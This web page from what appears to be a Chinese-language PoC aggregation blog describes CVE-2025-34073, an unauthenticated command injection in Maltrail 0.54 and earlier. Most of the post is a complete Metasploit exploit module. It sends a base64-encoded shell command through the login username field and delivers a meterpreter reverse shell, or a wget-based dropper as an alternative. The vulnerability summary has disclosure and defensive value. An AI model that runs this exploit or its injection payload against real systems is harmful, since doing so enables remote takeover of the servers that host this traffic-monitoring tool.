

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=light>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="lianccc">
  <meta name="keywords" content="">
  
    <meta name="description" content="漏洞信息漏洞名称： Maltrail Unauthenticated Command Injection 漏洞编号：  CVE： 2025-34073  漏洞类型： 命令执行 漏洞等级： 高危 漏洞描述： Maltrail是一个恶意流量检测系统，利用公开可用的黑名单来检测恶意或可疑的流量。该系统广泛应用于网络安全领域，用于监控和分析网络流量以识别潜在的安全威胁。在Maltrail版本0.54及更早">
<meta property="og:type" content="article">
<meta property="og:title" content="Maltrail Unauthenticated Command Injection">
<meta property="og:url" content="http://example.com/2025/07/03/github_3274882526/index.html">
<meta property="og:site_name" content="liancc&#39; infos blog">
<meta property="og:description" content="漏洞信息漏洞名称： Maltrail Unauthenticated Command Injection 漏洞编号：  CVE： 2025-34073  漏洞类型： 命令执行 漏洞等级： 高危 漏洞描述： Maltrail是一个恶意流量检测系统，利用公开可用的黑名单来检测恶意或可疑的流量。该系统广泛应用于网络安全领域，用于监控和分析网络流量以识别潜在的安全威胁。在Maltrail版本0.54及更早">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-07-03T12:45:19.000Z">
<meta property="article:modified_time" content="2025-07-03T12:45:19.886Z">
<meta property="article:author" content="lianccc">
<meta property="article:tag" content="命令执行">
<meta property="article:tag" content="rapid7&#x2F;metasploit-framework:github issues">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>Maltrail Unauthenticated Command Injection - liancc&#39; infos blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="liancc' infos blog" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Craw Info</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Maltrail Unauthenticated Command Injection"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-07-03 12:45" pubdate>
          2025年7月3日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          809 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          7 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Maltrail Unauthenticated Command Injection</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="漏洞信息"><a href="#漏洞信息" class="headerlink" title="漏洞信息"></a>漏洞信息</h1><p><strong>漏洞名称：</strong> Maltrail Unauthenticated Command Injection</p>
<p><strong>漏洞编号：</strong></p>
<ul>
<li><strong>CVE：</strong> 2025-34073</li>
</ul>
<p><strong>漏洞类型：</strong> 命令执行</p>
<p><strong>漏洞等级：</strong> 高危</p>
<p><strong>漏洞描述：</strong> Maltrail是一个恶意流量检测系统，利用公开可用的黑名单来检测恶意或可疑的流量。该系统广泛应用于网络安全领域，用于监控和分析网络流量以识别潜在的安全威胁。在Maltrail版本0.54及更早版本中，存在一个命令注入漏洞。该漏洞位于<code>mailtrail/core/httpd.py</code>文件中的<code>subprocess.check_output</code>函数，具体是在<code>params.get(&quot;username&quot;)</code>参数中。攻击者可以通过在username参数中注入任意操作系统命令来利用此漏洞。注入的命令将以运行进程的权限执行。此漏洞可以远程利用，且无需身份验证。成功利用此漏洞可能导致远程代码执行，进而可能完全控制受影响的系统。由于Maltrail通常部署在网络的关键位置，此漏洞的利用可能导致严重的安全事件，包括数据泄露和服务中断。</p>
<p><strong>产品厂商：</strong> Maltrail</p>
<p><strong>产品名称：</strong> Maltrail</p>
<p><strong>影响版本：</strong> version &lt;&#x3D; 0.54</p>
<p><strong>来源：</strong> <a target="_blank" rel="noopener" href="https://github.com/rapid7/metasploit-framework/blob/1944c699f8530a3f9355cbe579866f46f377934f/modules%2Fexploits%2Funix%2Fhttp%2Fmaltrail_rce.rb">https://github.com/rapid7/metasploit-framework/blob/1944c699f8530a3f9355cbe579866f46f377934f/modules%2Fexploits%2Funix%2Fhttp%2Fmaltrail_rce.rb</a></p>
<p><strong>类型：</strong> rapid7&#x2F;metasploit-framework:github issues</p>
<h1 id="POC详情"><a href="#POC详情" class="headerlink" title="POC详情"></a>POC详情</h1><figure class="highlight livescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br></pre></td><td class="code"><pre><code class="hljs livescript"><br><span class="hljs-comment">##</span><br><span class="hljs-comment"># This module requires Metasploit: https://metasploit.com/download</span><br><span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span><br><span class="hljs-comment">##</span><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">MetasploitModule</span> &lt; Msf::Exploit::Remote<br>  Rank = ExcellentRanking<br><br>  include Msf::Exploit::Remote::HttpClient<br>  include Msf::Exploit::CmdStager<br>  prepend Msf::Exploit::Remote::AutoCheck<br><br>  def initialize(info = &#123;&#125;)<br>    super(<br>      update_info(<br>        info,<br>        <span class="hljs-string">&#x27;Name&#x27;</span> =&gt; <span class="hljs-string">&#x27;Maltrail Unauthenticated Command Injection&#x27;</span>,<br>        <span class="hljs-string">&#x27;Description&#x27;</span> =&gt; %q&#123;<br>          Maltrail <span class="hljs-keyword">is</span> a malicious traffic detection system, utilizing publicly<br>          available blacklists containing malicious <span class="hljs-keyword">and</span>/<span class="hljs-keyword">or</span> generally suspicious trails.<br>          The Maltrail versions &lt;= <span class="hljs-number">0.54</span> <span class="hljs-keyword">is</span> suffering <span class="hljs-keyword">from</span> a command injection vulnerability.<br>          The `subprocess.check_output` <span class="hljs-keyword">function</span> <span class="hljs-keyword">in</span> `mailtrail/core/httpd.py` contains<br>          a command injection vulnerability <span class="hljs-keyword">in</span> the `params.get(<span class="hljs-string">&quot;username&quot;</span>)` parameter.<br>          An attacker can exploit this vulnerability <span class="hljs-keyword">by</span> injecting arbitrary OS commands<br>          into the username parameter. The injected commands will be executed <span class="hljs-keyword">with</span> the<br>          privileges <span class="hljs-keyword">of</span> the running process. This vulnerability can be exploited remotely<br>          without authentication.<br><br>          Successfully tested against Maltrail versions <span class="hljs-number">0.52</span> <span class="hljs-keyword">and</span> <span class="hljs-number">0.53</span>.<br>        &#125;,<br>        <span class="hljs-string">&#x27;License&#x27;</span> =&gt; MSF_LICENSE,<br>        <span class="hljs-string">&#x27;Author&#x27;</span> =&gt; [<br>          <span class="hljs-string">&#x27;Ege BALCI &lt;egebalci[at]pm.me&gt;&#x27;</span>, <span class="hljs-comment"># msf module</span><br>          <span class="hljs-string">&#x27;Valentin Lobstein&#x27;</span>,             <span class="hljs-comment"># Add CVE reference + rewrite</span><br>          <span class="hljs-string">&#x27;Chris Wild&#x27;</span>,                    <span class="hljs-comment"># original PoC, analysis</span><br>        ],<br>        <span class="hljs-string">&#x27;References&#x27;</span> =&gt; [<br>          [<span class="hljs-string">&#x27;EDB&#x27;</span>, <span class="hljs-string">&#x27;51676&#x27;</span>],<br>          [<span class="hljs-string">&#x27;CVE&#x27;</span>, <span class="hljs-string">&#x27;2025-34073&#x27;</span>],<br>          [<span class="hljs-string">&#x27;URL&#x27;</span>, <span class="hljs-string">&#x27;https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/&#x27;</span>],<br>          [<span class="hljs-string">&#x27;URL&#x27;</span>, <span class="hljs-string">&#x27;https://github.com/stamparm/maltrail/issues/19146&#x27;</span>]<br>        ],<br>        <span class="hljs-string">&#x27;Platform&#x27;</span> =&gt; %w[unix linux],<br>        <span class="hljs-string">&#x27;Privileged&#x27;</span> =&gt; <span class="hljs-literal">false</span>,<br>        <span class="hljs-string">&#x27;Arch&#x27;</span> =&gt; [ARCH_CMD, ARCH_X86, ARCH_X64],<br>        <span class="hljs-string">&#x27;Targets&#x27;</span> =&gt; [<br>          [<br>            <span class="hljs-string">&#x27;Unix Command&#x27;</span>,<br>            &#123;<br>              <span class="hljs-string">&#x27;Platform&#x27;</span> =&gt; <span class="hljs-string">&#x27;unix&#x27;</span>,<br>              <span class="hljs-string">&#x27;Arch&#x27;</span> =&gt; ARCH_CMD,<br>              <span class="hljs-string">&#x27;Type&#x27;</span> =&gt; :unix_cmd,<br>              <span class="hljs-string">&#x27;DefaultOptions&#x27;</span> =&gt; &#123;<br>                <span class="hljs-string">&#x27;PAYLOAD&#x27;</span> =&gt; <span class="hljs-string">&#x27;cmd/unix/python/meterpreter/reverse_tcp&#x27;</span><br>              &#125;<br>            &#125;<br>          ],<br>          [<br>            <span class="hljs-string">&#x27;Linux Dropper&#x27;</span>,<br>            &#123;<br>              <span class="hljs-string">&#x27;Platform&#x27;</span> =&gt; <span class="hljs-string">&#x27;linux&#x27;</span>,<br>              <span class="hljs-string">&#x27;Arch&#x27;</span> =&gt; [ARCH_X86, ARCH_X64],<br>              <span class="hljs-string">&#x27;Type&#x27;</span> =&gt; :linux_dropper,<br>              <span class="hljs-string">&#x27;CmdStagerFlavor&#x27;</span> =&gt; :wget,<br>              <span class="hljs-string">&#x27;DefaultOptions&#x27;</span> =&gt; &#123;<br>                <span class="hljs-string">&#x27;PAYLOAD&#x27;</span> =&gt; <span class="hljs-string">&#x27;linux/x64/meterpreter/reverse_tcp&#x27;</span><br>              &#125;<br>            &#125;<br>          ]<br>        ],<br>        <span class="hljs-string">&#x27;DisclosureDate&#x27;</span> =&gt; <span class="hljs-string">&#x27;2023-07-31&#x27;</span>,<br>        <span class="hljs-string">&#x27;DefaultTarget&#x27;</span> =&gt; <span class="hljs-number">0</span>,<br>        <span class="hljs-string">&#x27;Notes&#x27;</span> =&gt; &#123;<br>          <span class="hljs-string">&#x27;Stability&#x27;</span> =&gt; [CRASH_SAFE],<br>          <span class="hljs-string">&#x27;Reliability&#x27;</span> =&gt; [REPEATABLE_SESSION],<br>          <span class="hljs-string">&#x27;SideEffects&#x27;</span> =&gt; []<br>        &#125;<br>      )<br>    )<br>    register_options(<br>      [<br>        Opt::RPORT(<span class="hljs-number">8338</span>),<br>        OptString.<span class="hljs-keyword">new</span>(<span class="hljs-string">&#x27;TARGETURI&#x27;</span>, [ <span class="hljs-literal">true</span>, <span class="hljs-string">&#x27;The URI of the Maltrail server&#x27;</span>, <span class="hljs-string">&#x27;/&#x27;</span>])<br>      ]<br>    )<br>  end<br><br>  def check<br>    res = send_request_cgi(<br>      <span class="hljs-string">&#x27;uri&#x27;</span> =&gt; normalize_uri(target_uri.path),<br>      <span class="hljs-string">&#x27;method&#x27;</span> =&gt; <span class="hljs-string">&#x27;GET&#x27;</span><br>    )<br>    <span class="hljs-keyword">return</span> CheckCode::Unknown(<span class="hljs-string">&quot;<span class="hljs-subst">#&#123;peer&#125;</span> - Could not connect to web service - no response&quot;</span>) <span class="hljs-keyword">if</span> res.nil?<br>    <span class="hljs-keyword">return</span> CheckCode::Unknown(<span class="hljs-string">&quot;<span class="hljs-subst">#&#123;peer&#125;</span> - Check URI Path, unexpected HTTP response code: <span class="hljs-subst">#&#123;res.code&#125;</span>&quot;</span>) <span class="hljs-keyword">unless</span> res.code == <span class="hljs-number">200</span><br><br>    version = Rex::Version.<span class="hljs-keyword">new</span>(Regexp.last_match(<span class="hljs-number">1</span>)) <span class="hljs-keyword">if</span> res.body =~ %r&#123;<span class="hljs-string">\(v&lt;b&gt;([0-9.]+)&lt;/b&gt;\)&#125;</span><br><br>    <span class="hljs-keyword">if</span> version &lt; Rex::Version.<span class="hljs-keyword">new</span>(<span class="hljs-string">&#x27;0.54&#x27;</span>)<br>      <span class="hljs-keyword">return</span> CheckCode::Appears(<span class="hljs-string">&quot;Version Detected: <span class="hljs-subst">#&#123;version&#125;</span>&quot;</span>)<br>    end<br><br>    CheckCode::Safe(<span class="hljs-string">&quot;Version Detected: <span class="hljs-subst">#&#123;version&#125;</span>&quot;</span>)<br>  end<br><br>  def execute_command(cmd, _opts = &#123;&#125;)<br>    send_request_cgi(<br>      <span class="hljs-string">&#x27;uri&#x27;</span> =&gt; normalize_uri(target_uri.path, <span class="hljs-string">&#x27;login&#x27;</span>),<br>      <span class="hljs-string">&#x27;method&#x27;</span> =&gt; <span class="hljs-string">&#x27;POST&#x27;</span>,<br>      <span class="hljs-string">&#x27;uri_encode_mode&#x27;</span> =&gt; <span class="hljs-string">&#x27;none&#x27;</span>,<br>      <span class="hljs-string">&#x27;headers&#x27;</span> =&gt; &#123;<br>        <span class="hljs-string">&#x27;ctype&#x27;</span> =&gt; <span class="hljs-string">&#x27;application/x-www-form-urlencoded&#x27;</span><br>      &#125;,<br>      <span class="hljs-string">&#x27;data&#x27;</span> =&gt; <span class="hljs-string">&quot;username=;`echo+\&quot;<span class="hljs-subst">#&#123;Rex::Text.encode_base64(cmd)&#125;</span>\&quot;+|+base64+-d+|+sh;#`&quot;</span><br>    )<br>  end<br><br>  def exploit<br>    <span class="hljs-keyword">case</span> target[<span class="hljs-string">&#x27;Type&#x27;</span>]<br>    <span class="hljs-keyword">when</span> :unix_cmd<br>      print_status(<span class="hljs-string">&quot;Executing <span class="hljs-subst">#&#123;target.name&#125;</span>...&quot;</span>)<br>      execute_command(payload.encoded)<br>    <span class="hljs-keyword">when</span> :linux_dropper<br>      print_status(<span class="hljs-string">&quot;Executing <span class="hljs-subst">#&#123;target.name&#125;</span>...&quot;</span>)<br>      execute_cmdstager<br>    end<br>  end<br>end<br><br><br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Github-Poc/" class="category-chain-item">Github Poc</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" class="print-no-link">#命令执行</a>
      
        <a href="/tags/rapid7-metasploit-framework-github-issues/" class="print-no-link">#rapid7/metasploit-framework:github issues</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Maltrail Unauthenticated Command Injection</div>
      <div>http://example.com/2025/07/03/github_3274882526/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>lianccc</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年7月3日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/07/03/twitter_2436457289/" title="BlackHatEvents twitter update">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">BlackHatEvents twitter update</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/07/03/github_1759639730/" title="Wing FTP Server NULL-byte Authentication Bypass">
                        <span class="hidden-mobile">Wing FTP Server NULL-byte Authentication Bypass</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
